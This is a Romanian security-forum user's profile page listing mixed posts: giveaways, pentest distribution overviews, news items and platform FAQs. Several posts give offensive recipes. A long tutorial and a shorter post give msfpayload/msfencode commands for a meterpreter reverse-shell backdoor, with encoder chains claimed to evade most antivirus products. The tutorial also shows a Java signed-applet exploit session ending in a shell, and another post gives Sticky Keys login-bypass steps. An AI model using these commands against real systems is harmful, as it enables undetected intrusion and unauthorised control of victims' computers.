Jump to content

Wubi

Active Members
  • Posts

    893
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by Wubi

  1. Ai pus problema gresit. Nu sa nu poata face un topic nou, ci sa nu poata creea un topic in sectiunea Ajutor/Cereri. Nu e mare inginerie si nu ai inventat roata cu ideea asta.
  2. Hey guys! What's going on? Once again for this tutorial we will be picking up right where we left off... last time we got the encryption going on, so that all traffic between server/client is encrypted. Now that's pretty good, but it's time we start to enhance functionality of this shell and add new features to make life easier in the future. As I stated in the first video of the series, this shell is nice but due to the subprocess module in Python it does limit us to certain things, like using FTP or anything that involves spawning a new thread really -- at least to the extent of my testing! So we're gonna go ahead and implement perhaps one of the most fundamentals tasks really: file transferring over a raw, single-threaded socket. (...) Click here to keep reading article: Python Backdoor – File Transfer | Technic Dynamic Book - "Foundations of Python Network Programming" http://www.amazon.com/gp/product/1430230037/ref=as_li_ss_il?ie=UTF8&camp=... This whole series of videos was inspired by both David Kennedy (creator of SET) and the AverageSecurityGuy, you can find both of them here: TrustedSec - Information Security Made Simple AverageSecurityGuy
  3. G Data Mobile Security for Android which normally costs GBP 19.95. Is availabe free for limited period. G Data Mobile Security comes with anti-malware that regularly updates itself to protect your Android smartphone from the latest threats. It includes anti-theft function that protects your privacy in case your mobile is lost or stolen. Lock your phone or delete all of its data remotely by sending an SMS. You can even track your lost phone using Google maps. In addition to all these, G Data Mobile Security features a call filter function that can block unwanted messages and callers. Features G Data Mobile Security for Android : Security when mobile surfing and calling Protection for your identity and personal, confidential content such as messages or emails against viruses, malware and other spy programs. Authorization checking: which apps are allowed to initiate calls, send SMS or access the Internet? OnDemand virus checking Periodic virus checking Automatic checking of newly installed apps Authorization checking for installed apps Follow below step to grab free G Data Mobile Security for Android. Click here to visit promo page Enter the details. And click on the “G Data Mobile Security v2 Free Download” button. Use the username and password provided to unlock your free 90 days subscription. According to the promo page, you will receive up to four licenses, each valid for 90 days. Sursa: G Data Mobile Security for Android License Key hurry — PenTestIT
  4. Daca scuza lor pentru notele de 1 si 2 este sistemul, atunci sunt penibili.
  5. msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=1336 X | msfencode -c 1 -e x86/shikata_ga_nai > /root/Desktop/wubi_enc.exe Pentru a ramane nedetectabil pentru aproape 85 % din antivirusi: Shikata encoding de 5 ori; Countdown encoding de 5 ori; Shikata encoding de 5 ori; Alpha_Upper encoding de 2 ori;
  6. Scannere Vulnerabilitati ; https://rstcenter.com/forum/54371-scannere-vulnerabilitati.rst
  7. For those who believe in security via obscurity, Portspoof - the service signature obfuscator – could be the most important application in your arsenal. It is a multi-platform, free and open source software, distributed under GNU GPL version 2 license. Portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. General goal of this program is to make the port scanning software (Nmap/Unicornscan/etc) process slow and output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task. It uses a signature file that currently supports 1866 port signatures! Portspoof features: Fast: Multithreaded (by default 10 threads handle new incoming connections). Lightweight: Requires small amount of system resources. Portable: runs on BSD/Linux (support for OSX/Windows will be added). Flexible: You can easily use your firewall rules to define ports that are going to be spoofed. Effective against popular port scanners By default, portspoof will bind only to one port – 4444 on all interfaces and is extremely CPU friendly. So, after running this program and scanning it with Nmap, you will find that though not many ports are open in reality, a lot of false open ports will be detected. Download Portspoof: Portspoof 0.1 – portspoof.zip Sursa: PenTestIT — Your source for Information Security Related information!
  8. BackBox Backtrack Blackbuntu Matriux Weakerth4n Desigur, mai sunt si alte distributii de pentesting la fel de bune. BackBox BackBox este o distributie de Linux pentru pentestesting, bazata pe Ubuntu. Aceasta este una dintre cele mai usoare si rapide distributii de Linux care sunt in momentul de fata disponibile pe internet. Foloseste componenta Xfce pentru ambienta Desktop-ului, si este adecvat pentru analiza aplicatiilor web, retelelor, vulnerabilitatilor si pentesting. Partea interesanta la echipa BackBox este faptul ca daca este un tool ce nu se afla in repository, poti face un request si acestia il vor include. Cateva caracteristici oferite: Forensic Analysis Information Gathering Vulnerability Assessment Exploitation Privilege Escalation Maintaining Access Social Engineering Wireless Analysis Documentation and Reporting Reverse Engineering VoIP Analysis Tool List Vei gasi cele mai multe dintre tool-urile bine-cunoscute aici: Metasploit Nmap John the ripper Wireshark Dradis Ettercap Social Engineering Toolkit w3af Website: Home | BackBox Linux Screenshot: BackTrack Backtrack este un sistem de operare Linux pentru pentesteri si profesionisti in securitate ce are la baza Ubuntu. Este ideal pentru evaluarea infrastructurii retelelor, wireless cracking, exploatarea sistemelor, social engineering, sau evaluarea aplicatiilor web. Poti rula Backtrack de pe HardDisk, Live DVD, sau Thumbdrive. Lista de unelte: Metasploit Aircrack-NG Kismet Nmap Ettercap Wireshark BeEF (Browser Exploitation Framework) Hydra OWASP Mantra RFMON SET Website: BackTrack Linux - Penetration Testing Distribution ”The quieter you become,the more you are able to hear” Blackbuntu Blackbuntu este o alta distributie de pentesting ce are la baza Ubuntu 10.10, Linux 2.6.39 si Gnome 2.32.0. Cerinte sistem Procesor 1GHz x86 processor 768 MB (RAM) 10 GB spartiu pe disk pentru instalare Placa video capabila pentru 800×600 resolution Unitate DVD-ROM sau port USB Lista unelte: Information Gathering Network Mapping Vulnerability Identification Penetration Privilege Escalation Maintaining Access Radio Network Analysis VoIP Analysis Digital Forensic Reverse Engineering Miscellaneous Website: Blackbuntu Linux | Penetration Testing Distribution Screenshot: Matriux Matriux este o distributie open-source pentru ethical hacking si pentesting. Este un sistem de operare Live CD/DVD chiar daca are optiunea pentru instalare pe Hard Disk. Colectia de unelte este numita Arsenal. Distributia este ideala pentru: Digital Forensics Investigations Exploitation Reconnaissance Scanning Vulnerability Analysis Cracking Data Recovery Network Administration Ethical Hacking Website: Matriux - La Distribution Open Source orient?e S?curit? pour Ethical Hackers et Pentesters Screenshot: Weakerth4n Weakerth4n este i dustributie de pentesting dezvoltata din Debian Squeeze. Pentru ambientul desktop-ului foloseste Fluxbox. Sistemul de operare este ideal pentru WiFi hacking deoarece contine o multime de unelte Wireless. Weakerth4n are tool-uri pentru: Wifi attacks SQL Hacking Cisco Exploitation Password Cracking Web Hacking Bluetooth VoIP Hacking Social Engineering Information Gathering Fuzzing Android Hacking Networking Shells Website: hr.weaknetlabs.com - / Screenshot: Referinte: Penetration Testing Lab ; http://backtrack-linux.org ; http://www.backbox.org/ ; http://www.blackbuntu.com/ ; http://matriux.com/ ; http://hr.weaknetlabs.com/
  9. Muream prost nu alta...
  10. Description: In this video Thomas Piggott explaining how is Cryptography used in everyday life when using a credit or debit card? This is very good presentation and he is also discussing about Online Cryptography using SSL and public keys. This video is to understand how Cryptography is used when using a debit or credit card during everyday life, So in this video he will cover – 1) What is Cryptography? 2) Public Key Encryption 3) Secure Socket Layer and how this works when sending information over the internet. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Investigations in Cryptography on Vimeo
  11. The director of the US Pentagon's Missile Defense Agency (MDA) has chided employees and contractors for using government computers to surf porn. MDA, an agency of 8,000 employees, develops, fields, and upgrades the country's ground-and sea-based missile defense programs. On July 27, Executive Director John James Jr. sent out a memo citing instances of workers accessing x-rated sites as well as emailing explicit images—usage that exposes the network to malware or malicious code. Bloomberg News quotes the memo: In the one-page memo, James wrote that in recent months government employees and contractors were detected engaging in inappropriate use of the MDA network. MDA spokesman Rick Lehner told Bloomberg News that "less than a half-dozen" of the agency's 8,000 employees had been caught accessing restricted sites or downloading inappropriate materials, caught by what he called a "highly advanced monitoring system to detect intrusions, access to inappropriate websites, viruses and malware downloads." There was "never any compromise" of the network, Lehner said, given that the monitoring system "worked as designed." James wrote that those found breaking the rules would face disciplinary action, which could include suspension and removal from federal service or MDA-sponsored contracts, given that they'd put their security clearances in jeopardy. News outlets such as Wired are dubbing it the latest skirmish in an ongoing war on porn at the Pentagon. More to the point, porn has been used to deliver malware payloads. But so are lots of things: for example, removable storage devices. One example was the case of keyloggers found on USB drives left in public libraries. And as Sophos found when researchers bought 50 drives at a public auction, USB drives had a 66% chance of being infected with malware. And so, too, at the other end of the surfing/morality spectrum, are religious sites notorious for inflicting malware payloads. The MDA is far from the only organisation that has to deal with bored people and the potentially security-compromising shenanigans they can get up to on a network, be it surfing porn or religious sites. Experts on PLC/SCADA systems used in US prisons told the audience at the SOURCE:Boston security conference in the spring about walking into the heart of networking control rooms in correctional facilities, only to find employees whiling away their time surfing Facebook from these highly sensitive industrial control systems. Porn surfers might be wise to keep this past-time to the privacy of their own networks. Like all internet users, they should employ basic computer security precautions, such as: Using different passwords for every site, , and Changing passwords after a site's been breached, Vetting the security history of a given site. Intercepting incoming missiles may be a sleepy, uneventful role for MDA workers. Perhaps it's flat-out boring. But if keeping the nation's missile defense network clean of malware isn't enough incentive to avoid salacious surfing, perhaps the prospect of getting fired might be. After all, James didn't mince words: MDA workers, they're watching you. Sursa: US Pentagon tells Missile Defense Agency workers to quit surfing porn | Naked Security
  12. Free full version copies of Advanced SystemCare Pro that has a retail price of $19.99. German IT Development Ltd, UpdateStar, for a limited time is giving away. IObit Advaced SystemCare is a system optimization utility designed to improve system performance and security. The application provides an always-on, automated, all-in-one PC Healthcare Service with anti-spyware, privacy protection, performance tune-ups, and system cleaning capabilities. It can fix critical system errors, repair windows registry, clean up junk files, optimize internet connection and temporary disable unused services for gaming. Features of IObit Advanced SystemCare 5 Pro Speeds up PC performance and internet access Defends PC security with extra protection One click to solve as many as 10 common PC problems Real-time optimization with ActiveBoost function More than 20 dedicated smart tools for everyday PC maintenance New Cloud technology to keep database up-to-date Extremely easy to use Boost your PC for working and gaming And much more… Current Version: 5.4.0 File Size: 16.4 MB Operating System: Designed for Windows 8, Windows 7, Vista, XP and 2000 Follow below steps to download free IObit Advanced SystemCare 5 Pro it is limited period offer, so hurry!!! Click here to visit promo page for IObit Advaced SystemCare 5 Pro Enter your email id. You will recive download details and license details in mail. Sursa: PenTestIT — Your source for Information Security Related information!
  13. 1. Welcome to the first TekTip episode from TekDefense.com. In this episode we talk about and demo basic dynamic malware analysis. Tools we leveraged here include VMWare Workstation, Sysinternal Suite, Netcat, ApateDNS, Wireshark, Regshot. 2. Welcome to TekTip episode 2 from TekDefense.com. In this episode we will continue our discussions on basic dynamic malware analysis. We will be focusing on FakeNet. 3. In this episode of TekTip we take a break from Malware Analysis and play with an old sys admin trick commonly known as the Sticky Keys trick. I cannot tell you how many times I have used this to log into lockedout machines from family, friends, co-workers, and clients. This will work on XP, server 2003, Vista, Windows 7, and probably the rest of them as well. A quick summarry of the steps involved are: Boot to a live linux distro (BT5 will work fine) Mount the windows drive Replace sethc.exe with cmd.exe Reboot to Windows Press shift 5 times to bring up command prompt. Command prompt aquired, mission accomplished.
  14. Description: This and more videos in: Blog de Omar Follow me in Facebook: El Palomo | Facebook Follow me in Twitter: @ElPalomo_Blog This video shows: How to get HASH in Windows 7 Diference between LM Hash vs NTLM Hash NTLM Hash Rainbow Tables Conclusions and recommendations Spanish video version: Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
  15. Nu e o o noutate intrebarea "Cum sa eviti un antivirus?". Userii noi(script-kiddies) sunt nerabdatori sa invete caile prin care sa`si puna keylogger-ele, stealer-ele si RAT-urile. Ma rog, sa presupunem ca o companie te`a angajat in a face o evaluare a vulnerabilitatii unei retele. Acestia iti vor da un "black box", o "cutie neagra" unde sa testezi, doar ca tu nu detii prea multe informatii despre retea. Daca ei folosesc o solutie anti-virus pe acea retea, cand vei incerca sa faci un test, sistemul antivirus il va opri. Asta inseamna ca primul obstacol este evitarea anti-virusului. Este usor sa vorbim de o unealta care poate ascunde orice fisier din "ochii" antivirusului, dar cred ca va fi mult mai eficient sa intelegi povestea din spatele uneltei. Asta vreau sa acoper in topic-ul asta: Cum functioneaza Anti-virusul Care sunt caile, (tehnicile) de evitare a unui Anti-virus Un tutorial Metasploit pentru a evita un anti-virus Cum functioneaza Anti-virusul Este foarte important sa discutam mecanismul prin care functioneaza anti-virusul, deoarece daca nu sti cum functioneaza un anti-virus sau cum acesta iti detecteaza virusul, iti vei limita abilitatea sa eviti sau sa pacalesti anti-virusul. Sunt multe compani care isi creaza anti-virusii in propriul lor mod, dar ambele impart acelasi mod de detectare a unui virus: Detectarea pe baza semnaturii Comportament suspicios Detectarea pe baza de semnatura este cel mai comun, si cea mai folosita tehnica. Un sistem antivirus compara continutul fisierului cu baza lui de date. Partea urata, poate detecta doar virusii cunoscuti. Cealalta metoda este bazata pe monitorizarea activitatii suspicioase. Prin aceasta tehnica antivirusul observa continuu(in timp real) comportamentul unui fisier. Daca orice fisier se suprascrie pe el insusi, si fura date fara permisiunea utilizatorului, atunci acel fisier este tratat ca fiind virus. Exemplu Sa presupunem sa avem instalat un anti-virus in computer. Cand iti conectezi USB-ul, sunt doua optiuni: Anti-virusul va detecta automat virusii (bazat pe activitati suspicioase) Vei porni o scanare pe USB si anti-virusul va gasi virusi (Detectarea pe baza semnaturii) Astfel lucreaza anti-virusul.Va trebui sa discutam despre format-ul fisierului. PE, sau portable executive (executiv portabil) este formatul implicit al fisierului pentru windows binary. Multi dintre virusi si malware se ascund in PE. Probabil te intrebi care este structura unui fisier PE si cum citeste antivirusul semnatura. +-------------------------------------+ | DOS-stub | +-------------------------------------+ |antet-ul(header-ul) fisierului PE | +-------------------------------------+ | header optional | |- - - - - - - - - -- - - - - - - - - | | | | directoarele de date | | | +-------------------------------------+ | | | imagine de pagini | | | +-------------------------------------+ | | | sectiunea tabelelor | | | +-------------------------------------+ | | | sectiunea 1 | | | +-------------------------------------+ | | | ... | | | +-------------------------------------+ | | | sectiunea n | | | +-------------------------------------+ Asta este structura tipica a unui fisier PE. Fiecare sectiune poate fi divizata(impartita) in mai multe sub-sectiuni. Antetul(headerul) este cea mai importanta sectiune, aceasta contine: Bytii semnaturii Data si ora Imaginea de baza si dimensiunea imaginii Dimensiunea stack reverse Tabelul debug Tabelul Fixup Tabelul de securitate etc Deci antetul fisierului PE este cel ce contine semnatura si alte valori importante ale oricarui fisier executabil. In semnatura fisierului, primul numar de obicei reprezinta tipul microprocesorului. Microprocesorul tipic este 16-bit, 32-bit, si 64-bit. De exemplu, procesorul 80386 are valoarea, 0x14c. Sa luam un exemplu al unui backdoor netcat listener, ce are atasat cmd pe port 99 pentru conectarea cu serverul. Facand o mica analiza, putem vedea ca semnatura este situata pe offset-ul E77E. Acum doar imagineaza`ti importanta semnaturii in orice fisier PE. Sunt destule tool-uri disponibile sa gasesti asta. Daca vrei sa eviti antivirsul atunci va fi nevoie sa modifici semnatura pentru ca antivirusul sa`l trateze ca pe un fisier normal. Mai jos sunt niste utilitati bazate pe netcat ce au abilitatea sa evite anti-virusul. Cryptcat Project: This is an advanced utility based on netcat and one that uses an encryption technique with the ports of Windows, BSD and Linux. MOCAT backdoor: This one is based on the cryptcat project and works on client and server phenomena, meaning it has two executables: one for windows and the other for Linux. All communications of MOCAT are encrypted. Ncat : Ncat is a wonderful tool that has been designed by the nmap community. It works on both TCP and UDP ports and on Ipv4 as well as Ipv6. Evitarea unui Anti-Virus - Tutorial Metasploit Prima parte in discutia noastra s`a concentrat asupra importantei encodarii pentru a evita un anti-virus. Metasploit este o unealta superba cu multe encodere pentru a evita antivirus-urile. Unele dintre encodere sunt bazate pe cod polymorphic (polymorphic virus). Codul Polymorphic schimba semnatura de fiecare data cand infecteaza un fisier nou. Shikata_ga_nai pare a fi cel mai bun encoder pentru un virus. Fisierul tau evita cu usurinta majoritatea anti-virusurilor. Cea mai buna combinatie sa eviti aproape 85 % din anti-virusi este: Shikata encoding de 5 ori Alpha_Upper encoding de 2 ori Shikata encoding de 5 ori Countdown encoding de 5 ori In comformitate cu toolkit-ul social engineering, shikata_ga_nai este un foarte bun encoder: Poti gasi o lista cu encoderele disponibile din metasploit, urmand comenzile de mai jos. Exemplu fara encoder Prima demonstratie a fost facuta fara vreun encoder. In cea de`a doua, voi folosi cel mai bun encoder, dupa care vom compara rezultatele celor doua. Primul pas in generarea unui backdoor: root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=1337 X > /root/Desktop/wubi.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"IP", "LPORT"=>"1337"} root@bt:~# Dupa cum vezi, majoritatea anti-virusurilor au detectat ceva malware in fisier, detection ratio 28 / 40. Exemplu cu Encoder In acest exemplu voi folosi un encoder ce ii va permite backdoor-ului sa evite antivirusurile. Sa incepem: root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=1337 X | msfencode -c 1 -e x86/shikata_ga_nai > /root/Desktop/wubi_enc.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"IP", "LPORT"=>"1337"} [*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1) root@bt:~# Acum cred ca puteti vedea diferenta dintre cele doua fisiere. wubi.exe(fara encoder) / wubi_enc.exe(cu encoder) Evitarea unui Anti-virus in timpul exploatarii Acum luand in considerare cealalta poza: acele exploit-uri automatice intampina ceva probleme cand, prin intermediul unui sistem vulnerabil tu esti capabil sa preiei controlul asupra lui, dar un antivirus este pornit si poate atunci sa devina suparator. Un alt exemplu: msf > use exploit/multi/browser/java_signed_applet msf exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(java_signed_applet) > set LHOST IP LHOST => IP msf exploit(java_signed_applet) > exploit [*] Exploit running as background job. [*] Started reverse handler on IP:4444 [*] Using URL: http://0.0.0.0:8080/bOX4eN [*] Local IP: http://IP:8080/bOX4eN [*] Server started. msf exploit(java_signed_applet) > [*] Handling request from IP:39663... [*] Sending SiteLoader.jar to IP. Waiting for user to click 'accept'... [*] Sending SiteLoader.jar to IP. Waiting for user to click 'accept'... [*] Generated executable to drop (37888 bytes). [*] Compiling applet classes... [*] Compile completed. Building jar file... [*] Jar built. Signing... [*] Jar signed. Ready to send. Sistemul victimei este Windows, si are pornit antivirusul(AVG), dar acesta nu da nicio sesiune. Chiar daca victima este vulnerabila, atacatorul va esua, din pricina antivirusului. Acum, voi schimba putin scenariul: metasploit foloseste un template.exe implicit pentru generarea executivelor, si pentru a evita un antivirus, avem nevoie sa folosim un executiv windows personalizat. Dar despre telnet? Ce port-uri sunt disponibile pentru o conexiune RDP? Pstools este o resursa minunata de toolkit-uri. PsExec se regaseste printre aceste tool-uri. Este o utilitara ce iti permite sa executi programe pe sisteme la distanta: msf exploit(java_signed_applet) > set Template /tmp/pstools/psexec.exe Template => /tmp/pstools/psexec.exe msf exploit(java_signed_applet) > exploit [*] Exploit running as background job. [*] Started reverse handler on IP:4444 [*] Using URL: http://0.0.0.0:8080/bOX4eN [*] Local IP: http://IP:8080/bOX4eN [*] Server started. msf exploit(java_signed_applet) > [*] Handling request from IP:39663... [*] Sending SiteLoader.jar to IP. Waiting for user to click 'accept'... [*] Sending SiteLoader.jar to IP. Waiting for user to click 'accept'... [*] Generated executable to drop (37888 bytes). [*] Compiling applet classes... [*] Compile completed. Building jar file... [*] Jar built. Signing... [*] Jar signed. Ready to send. [*] Sending stage (748032 bytes) to IP [*] Meterpreter session 1 opened (IP:4444 -> IP:5807) msf exploit(java_signed_applet) > sessions -i 1 [*] Starting interaction with 1... Concluzie Sunt cateva tutoriale si tehnici foarte bune pentru a evita un antivirus. Printe acestea sunt ceva cryptere, wrappere si alte unelte ce se gasesc pe internet publucului. Dar descarcarea acestor fisiere de la surse nesigure sau necunoscute poate fi periculos. Unii oameni folosesc aceste tehnici sa ia avantaje din partea celor inocenti, deci atunci cand descarci si instalezi orice fel de fisier, pastreaza in minte faptul ca acolo este o sansa ca sistemul tau sa fie in pericol pentru tot felul de malware si backdoor-uri. Ultima dar nu cea din urma, niciodata sa nu te increzi in surse necunoscute. Una peste alta, vei deveni urmatoarea victima, chiar daca ai un anti-virus sau nu. Acum ca ai vazut cat de usor este sa`l eviti. Referinte BackTrack Linux - Penetration Testing Distribution Metasploit Penetration Testing Software | Metasploit Framework | Metasploit Project InfoSec Resources
  16. Wubi

    Ufooo pornoooooooooo

  17. S`a inteles eronat, optiunea Crypt, va crypta fisierul intr`un algoritm ales din fereastra de optiuni, unde va fi nevoie sa specifici o parola(key). Pentru a decrypta la loc fisierul, este nevoie de acel key(parola). Odata introdus gresit key-ul, fisierului va fi compromis in timpul decryptarii. Momentan merge numai RC4, iar in cursul zilei de azi urmeaza sa se implementeze si restul.
  18. Nu, nu prea cred ca este vreo problema intre platforma si browserul Chrome. Chat-ul are nevoie sa seteze un Cookie, probabil asta cauzeaza eroarea.
  19. Cel mai probabil asta se intampla in timpul in care se lucra la el. Acum este disponibil chat-ul.
  20. 1. Nu ai o limita de fisiere pe care le poti urca pe platforma. 2. Nu poti rula fisiere executabile pe pOS. 3. Momentan contul VIP beneficiaza de acces la directorul public VIP. User custom pe chat. Si va fi implementat curand pentru utilizatorii VIP, acces la un set de unelte, scannere, gen SQLMap, w3af, metasploit, whatweb, jtr, s.a.m.d. 4. Chat-ul este functional si da, este accesibil numai din interiorul platformei. 5. Fisierele urcate nu sunt scanate insa nu pot executa coduri malitioase inautrul sau in afara platformei. A fost discutata o solutie prin care fisierele sa fie scanate in timpul upload-ului dar a fost refuzata pe motivul ca sunt utilizatori ce vor sa urce Cryptere, si tot felul de programe. Nu ai motive sa iti faci astfel de griji. 6. Parolele sunt bine criptate. Va fi facut un ToS si Privacy Policy in care vom explica mai pe larg ce si cum despre lucruri de genul.
×
×
  • Create New...